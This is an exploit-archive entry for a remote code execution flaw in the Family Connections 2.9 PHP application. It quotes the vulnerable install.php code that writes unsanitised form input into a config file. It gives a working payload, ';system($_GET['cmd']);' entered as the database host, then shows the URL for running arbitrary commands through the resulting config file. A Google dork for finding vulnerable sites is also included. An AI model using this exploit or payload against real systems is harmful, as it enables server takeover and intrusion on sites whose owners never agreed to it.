Family Connections 2.9 Php Code Execution

2012-03-28T00:00:00
ID 1337DAY-ID-17784
Type zdt
Reporter L3b-r1'z
Modified 2012-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:  Family   Connections  2.9 Php  COde  Execution
# Date: 28/mar/2012
# Author: L3b-r1'z
# Vendor or Software Link: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/
# Version: 2.9
# Category: webapps
# Google dork: allintext: "Family  Connections  2.9"
# Tested on: linux \ bt
# Security: RISK
# Greet'z : B0x , Mad Hacker'z , Sec4ever , Sec4leb (Sec4leb.com) , I-Hmx , Mr.Black , Lito , Mr.XKILler , Mr.Ps , The Injector , Ked-Ans , Unk Hacker , Inj3ct0r Team , And All My Friends :D

vuln  COde  in : /install.php

Line : 383 {


    $file = fopen('inc/config_inc.php', 'w') or die("<h1>Error Creating Config File</h1>");
    $str  = "<?php \$cfg_mysql_host = '".$_POST['dbhost']."'; \$cfg_mysql_db = '".$_POST['dbname']."'; \$cfg_mysql_user = '".$_POST['dbuser']."'; \$cfg_mysql_pass = '".$_POST['dbpass']."'; ?".">";

    fwrite($file, $str) or die("<h1>Could not write to config.</h1>");
    fclose($file);
    }
    
let See The Config ^_^ 
----------------------
<?php 
$cfg_mysql_host = 'localhost';
$cfg_mysql_db = 'test'; 
$cfg_mysql_user = 'root'; 
$cfg_mysql_pass = 'root'; 
?>

So We Can Put  COde  Excution In Install.php 

P0c : 

Http://Domain.tld/install.php

Screen SHot :
http://stufriends.net/forum/1337/1337.png

Then Press NEXT , Then :

Put In Database Host *
----------------------
';system($_GET['cmd']);'

In Database Name * 
------------------

Any Thing

In Database Username *
----------------------

Any Thing 

In Database Password *
----------------------

Any thing 

---------

press next and go to 

Domain.tld/inc/config_inc.php?cmd=Your Linux Or Win Command ;)

B0x Thx For Help :) 

./EOM



#  0day.today [2018-03-05]  #